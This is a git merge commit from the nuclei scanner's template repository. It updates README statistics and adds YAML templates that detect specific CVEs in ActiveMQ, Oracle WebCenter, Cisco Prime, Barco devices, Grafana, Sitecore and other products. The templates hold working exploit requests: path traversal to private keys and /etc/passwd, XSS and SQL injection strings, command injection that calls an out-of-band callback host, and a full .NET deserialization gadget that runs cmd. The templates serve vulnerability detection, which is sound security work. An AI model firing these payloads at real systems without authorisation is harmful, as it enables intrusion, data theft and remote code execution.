Merge branch 'master' into token-spray-fix

patch-1
Prince Chaddha 2021-11-10 15:23:35 +05:30 committed by GitHub
commit 7e19fd22df
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
77 changed files with 2513 additions and 1063 deletions

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 | | cve | 862 | dhiyaneshdk | 315 | cves | 867 | info | 840 | http | 2347 |
| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 | | lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 |
| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 | | panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 500 | network | 46 |
| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 | | xss | 269 | pdteam | 210 | technologies | 211 | critical | 306 | dns | 12 |
| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | | | wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | |
| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | | | exposure | 253 | dwisiswant0 | 152 | misconfiguration | 150 | | | | |
| rce | 218 | gy741 | 83 | token-spray | 83 | | | | | | rce | 222 | gy741 | 85 | token-spray | 102 | | | | |
| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | | | tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | |
| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | | | wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | |
| cve2020 | 166 | madrobot | 63 | file | 51 | | | | | | cve2021 | 169 | madrobot | 65 | file | 57 | | | | |
**178 directories, 2459 files**. **182 directories, 2531 files**.
</td> </td>
</tr> </tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 | | cve | 862 | dhiyaneshdk | 315 | cves | 867 | info | 840 | http | 2347 |
| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 | | lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 |
| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 | | panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 500 | network | 46 |
| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 | | xss | 269 | pdteam | 210 | technologies | 211 | critical | 306 | dns | 12 |
| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | | | wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | |
| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | | | exposure | 253 | dwisiswant0 | 152 | misconfiguration | 150 | | | | |
| rce | 218 | gy741 | 83 | token-spray | 83 | | | | | | rce | 222 | gy741 | 85 | token-spray | 102 | | | | |
| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | | | tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | |
| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | | | wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | |
| cve2020 | 166 | madrobot | 63 | file | 51 | | | | | | cve2021 | 169 | madrobot | 65 | file | 57 | | | | |

View File

@ -0,0 +1,40 @@
id: CVE-2016-3088
info:
name: ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)
author: fq_hsu
severity: critical
description: The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.
reference:
- https://www.exploit-db.com/exploits/40857
- https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
- http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
- https://nvd.nist.gov/vuln/detail/CVE-2016-3088
tags: fileupload,cve,cve2016,apache,activemq
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2016-3088
cwe-id: CWE-20
requests:
- raw:
- |
PUT /fileserver/test.txt HTTP/1.1
Host: {{Hostname}}
{{randstr}}
- raw:
- |
GET /fileserver/test.txt HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1==204"
- "status_code_2==200"
- "contains((body_2), '{{randstr}}')"
condition: and

View File

@ -39,7 +39,7 @@ requests:
<string>-c</string> <string>-c</string>
</void> </void>
<void index="2"> <void index="2">
<string>wget {{interactsh-url}}</string> <string>nslookup {{interactsh-url}}</string>
</void> </void>
</array> </array>
<void method="start"/></void> <void method="start"/></void>
@ -49,8 +49,13 @@ requests:
<soapenv:Body/> <soapenv:Body/>
</soapenv:Envelope> </soapenv:Envelope>
matchers-condition: and
matchers: matchers:
- type: word - type: word
part: interactsh_protocol # Confirms the HTTP Interaction part: interactsh_protocol # Confirms the DNS interaction
words: words:
- "http" - "dns"
- type: status
status:
- 500

View File

@ -0,0 +1,38 @@
id: CVE-2017-10974
info:
name: Yaws 1.91 - Remote File Disclosure
author: 0x_Akoko
severity: high
description: Yaws 1.91 allows Unauthenticated Remote File Disclosure via HTTP Directory Traversal with /%5C../ to port 8080
reference:
- https://www.exploit-db.com/exploits/42303
- https://nvd.nist.gov/vuln/detail/CVE-2017-10974
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-10974
cwe-id: CWE-22
tags: cve,cve2017,yaws,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/%5C../ssl/yaws-key.pem"
matchers-condition: and
matchers:
- type: word
words:
- "BEGIN RSA PRIVATE KEY"
- type: status
status:
- 200
- type: dsl
dsl:
- '!contains(tolower(body), "<html")'
- '!contains(tolower(body), "<HTML")'
condition: or

View File

@ -0,0 +1,36 @@
id: CVE-2017-15363
info:
name: Typo3 Restler Extension - Local File Disclosure
author: 0x_Akoko
severity: high
description: Directory traversal vulnerability in public/examples/resources/getsource.php in Luracast Restler through 3.0.0, as used in the restler extension before 1.7.1 for TYPO3, allows remote attackers to read arbitrary files via the file parameter.
reference:
- https://www.exploit-db.com/exploits/42985
- https://www.cvedetails.com/cve/CVE-2017-15363
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-15363
cwe-id: CWE-98
tags: cve,cve2017,restler,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?php"
- "'host'"
- "'database'"
- "'extConf'"
- "'debug'"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,31 @@
id: CVE-2017-5982
info:
name: Kodi 17.1 Local File Inclusion
author: 0x_Akoko
severity: high
description: Insufficient validation of user input is performed on this URL resulting in a local file inclusion vulnerability.
reference:
- https://cxsecurity.com/issue/WLB-2017020164
- https://www.cvedetails.com/cve/CVE-2017-5982
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-5982
cwe-id: CWE-98
tags: cve,cve2017,kodi,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

View File

@ -25,7 +25,7 @@ requests:
- type: regex - type: regex
regex: regex:
- "admin:.*:" - "admin:.*:*sh$"
- type: status - type: status
status: status:

View File

@ -1,11 +1,10 @@
id: CVE-2018-2791 id: CVE-2018-2791
info: info:
name: Oracle WebCenter Sites XSS name: Oracle WebCenter Sites Multiple XSS
author: madrobot author: madrobot,leovalcante
severity: high severity: high
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware.
tags: cve,cve2018,oracle,xss
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
cvss-score: 8.20 cvss-score: 8.20
@ -15,20 +14,30 @@ info:
- http://www.securitytracker.com/id/1040695 - http://www.securitytracker.com/id/1040695
- http://www.securityfocus.com/bid/103800 - http://www.securityfocus.com/bid/103800
- https://www.exploit-db.com/exploits/44752/ - https://www.exploit-db.com/exploits/44752/
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
tags: cve,cve2018,oracle,xss,wcs
requests: requests:
- method: GET - raw:
path: - |
- "{{BaseURL}}/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError" GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{BaseURL}}
matchers-condition: and - |
GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1
Host: {{BaseURL}}
stop-at-first-match: true
matchers-condition: or
matchers: matchers:
- type: word - type: word
words:
- "<h1xxx<scriptalert(1)</script"
part: body part: body
words:
- '<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif'
- type: word - type: word
part: body
words: words:
- "text/html" - '<script>alert(24)</script>'
part: header - 'Missing translation key'
condition: and

View File

@ -0,0 +1,45 @@
id: CVE-2018-3238
info:
name: Multiple XSS Oracle WebCenter Sites
author: leovalcante
severity: medium
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 11.1.1.8.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites.
reference:
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://nvd.nist.gov/vuln/detail/CVE-2018-3238
tags: cve,cve2018,oracle,wcs,xss
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
cvss-score: 6.90
cve-id: CVE-2018-3238
requests:
- raw:
- |
GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq"><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
- |
GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
- |
GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif'
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'Variables.cs_imagedir'
condition: and

View File

@ -0,0 +1,57 @@
id: CVE-2019-1821
info:
name: Cisco Prime Infrastructure Unauthorized RCE (CVE-2019-1821)
author: _0xf4n9x_
severity: critical
description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability.
reference:
- https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-1821
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1821
metadata:
shodan-query: 'http.title:"prime infrastructure"'
tags: rce,fileupload,unauth,cve,cve2019
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2019-1821
cwe-id: CWE-20
requests:
- raw:
- |
POST /servlet/UploadServlet HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
Primary-IP: 127.0.0.1
Filename: test.tar
Filesize: 10240
Compressed-Archive: false
Destination-Dir: tftpRoot
Filecount: 1
Content-Length: 269
Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83
--871a4a346a547cf05cb83f57b9ebcb83
Content-Disposition: form-data; name="files"; filename="test.tar"
../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}}
--871a4a346a547cf05cb83f57b9ebcb83--
- |
GET /test.txt HTTP/1.1
Host: {{Host}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code==200"
- "contains((body_2), '{{randstr}}')"
condition: and

View File

@ -0,0 +1,31 @@
id: CVE-2019-2578
info:
name: Broken Access Control Oracle WebCenter Sites
author: leovalcante
severity: high
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
reference: https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
tags: cve,cve2019,oracle,wcs,auth-bypass
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.60
cve-id: CVE-2019-2578
requests:
- raw:
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
Host: {{Hostname}}
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers:
- type: regex
part: body
regex:
- '<script[\d\D]*<throwexception/>'

View File

@ -0,0 +1,51 @@
id: CVE-2019-2579
info:
name: Oracle WebCenter Sites - SQL Injection
author: leovalcante
severity: medium
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
reference:
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://github.com/Leovalcante/wcs_scanner
tags: cve,cve2019,oracle,wcs,sqli
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.30
cve-id: CVE-2019-2579
requests:
- raw:
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
Host: {{Hostname}}
- |
POST /cs/ContentServer HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+
cookie-reuse: true
extractors:
- type: regex
name: authkey
part: body
internal: true
group: 1
regex:
- "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"
matchers-condition: and
matchers:
- type: word
words:
- "value='&#39; and &#39;1&#39;=&#39;0 --"
- "Use this utility to view and manage URLs"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,33 @@
id: CVE-2019-3929
info:
name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929)
author: _0xf4n9x_
severity: critical
description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
reference:
- http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html
- https://www.exploit-db.com/exploits/46786/
- https://nvd.nist.gov/vuln/detail/CVE-2019-3929
tags: rce,cve,cve2019,oast
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2019-3929
cwe-id: CWE-78
requests:
- method: POST
path:
- "{{BaseURL}}/cgi-bin/file_transfer.cgi"
body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27"
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

View File

@ -0,0 +1,50 @@
id: CVE-2020-26413
info:
name: Gitlab User enumeration via Graphql API
author: _0xf4n9x_,pikpikcu
severity: medium
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible.
reference:
- https://gitlab.com/gitlab-org/gitlab/-/issues/244275
- https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json
- https://nvd.nist.gov/vuln/detail/CVE-2020-26413
tags: cve,cve2020,gitlab,exposure,enum
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2020-26413
cwe-id: CWE-200
requests:
- raw:
- |
POST /api/graphql HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }",
"variables": null,
"operationName": null
}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"username":'
- '"avatarUrl":'
- '"node":'
condition: and
- type: status
status:
- 200
extractors:
- type: json
part: body
json:
- '.data.users.edges[].node.email'

View File

@ -60,4 +60,4 @@ requests:
part: interactsh_request part: interactsh_request
group: 1 group: 1
regex: regex:
- '([a-z0-9]+)\.([a-z0-9]+)\.interactsh\.com' - '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'

View File

@ -0,0 +1,34 @@
id: CVE-2021-31602
info:
name: Pentaho <= 9.1 Authentication Bypass of Spring APIs
author: pussycat0x
severity: medium
reference:
- https://seclists.org/fulldisclosure/2021/Nov/13
- https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software
- https://hawsec.com/publications/pentaho/HVPENT210401-Pentaho-BA-Security-Assessment-Report-v1_1.pdf
metadata:
shodan-query: 'Pentaho'
tags: cve,cve2021,pentaho,auth-bypass
description: "An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\n\n"
requests:
- method: GET
path:
- "{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js"
- "{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<roleList>'
- '<roles>Anonymous</roles>'
condition: and
- type: status
status:
- 200

View File

@ -25,8 +25,8 @@ requests:
Connection: close Connection: close
X-Requested-With: XMLHttpRequest X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://{{Hostname}}/ Origin: {{BaseURL}}
Referer: http://{{Hostname}}/ Referer: {{BaseURL}}
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0} {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
@ -40,10 +40,10 @@ requests:
- type: word - type: word
part: body part: body
words: words:
- "\"result\":true" - '"result":true'
- "id" - 'id'
- "params" - 'params'
- "session" - 'session'
condition: and condition: and
extractors: extractors:

View File

@ -33,15 +33,12 @@ requests:
Host: {{Hostname}} Host: {{Hostname}}
req-condition: true req-condition: true
matchers-condition: and
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- "contains(body_2,'uid=') && contains(body_2,'gid=')" - "contains(body_2,'uid=') && contains(body_2,'gid=')"
- "status_code_1 == 500 && status_code_2 == 200"
- type: status condition: and
status:
- 200
extractors: extractors:
- type: regex - type: regex

View File

@ -0,0 +1,46 @@
id: CVE-2021-41174
info:
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering XSS
author: pdteam
severity: medium
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
reference:
- https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8
- https://nvd.nist.gov/vuln/detail/CVE-2021-41174
tags: cve,cve2021,grafana,xss
metadata:
shodan-query: title:"Grafana"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-41174
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"
skip-variables-check: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Grafana"
- "frontend_boot_js_done_time_seconds"
condition: and
- type: regex
regex:
- '"subTitle":"Grafana (v8\.(?:(?:1|0)\.[0-9]|2\.[0-2]))'
extractors:
- type: regex
group: 1
regex:
- '"subTitle":"Grafana ([a-z0-9.]+)'

View File

@ -0,0 +1,114 @@
id: CVE-2021-42237
info:
name: Sitecore Experience Platform Pre-Auth RCE
author: pdteam
severity: critical
description: Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.
reference:
- https://blog.assetnote.io/2021/11/02/sitecore-rce/
- https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776
- https://nvd.nist.gov/vuln/detail/CVE-2021-42237
remediation:
For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions-
- Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher.
- Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
- Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below.
- For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
metadata:
shodan-query: http.title:"SiteCore"
tags: rce,sitecore,deserialization,oast
requests:
- raw:
- |
POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<?xml version="1.0" ?>
<a>
<query></query>
<source>foo</source>
<parameters>
<parameter name="">
<ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"
xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
xmlns:x="http://www.w3.org/2001/XMLSchema"
xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/">
<Count z:Id="2" z:Type="System.Int32" z:Assembly="0"
xmlns="">2</Count>
<Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0"
xmlns="">
<_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"
xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic"
xmlns:a="http://schemas.datacontract.org/2004/07/System">
<Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0"
xmlns="">
<a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>
<a:delegateEntry z:Id="7">
<a:assembly z:Ref="6" i:nil="true"/>
<a:delegateEntry i:nil="true"/>
<a:methodName z:Id="8">Compare</a:methodName>
<a:target i:nil="true"/>
<a:targetTypeAssembly z:Ref="6" i:nil="true"/>
<a:targetTypeName z:Id="9">System.String</a:targetTypeName>
<a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
</a:delegateEntry>
<a:methodName z:Id="11">Start</a:methodName>
<a:target i:nil="true"/>
<a:targetTypeAssembly z:Id="12">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>
<a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName>
<a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
</Delegate>
<method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
xmlns=""
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
<Name z:Ref="11" i:nil="true"/>
<AssemblyName z:Ref="12" i:nil="true"/>
<ClassName z:Ref="13" i:nil="true"/>
<Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature>
<Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2>
<MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType>
<GenericArguments i:nil="true"/>
</method0>
<method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
xmlns=""
xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
<Name z:Ref="8" i:nil="true"/>
<AssemblyName z:Ref="6" i:nil="true"/>
<ClassName z:Ref="9" i:nil="true"/>
<Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature>
<Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2>
<MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType>
<GenericArguments i:nil="true"/>
</method1>
</_comparison>
</Comparer>
<Version z:Id="23" z:Type="System.Int32" z:Assembly="0"
xmlns="">2</Version>
<Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
xmlns="">
<string z:Id="25"
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c nslookup {{interactsh-url}}</string>
<string z:Id="26"
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd</string>
</Items>
</ArrayOfstring>
</parameter>
</parameters>
</a>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
- "dns"
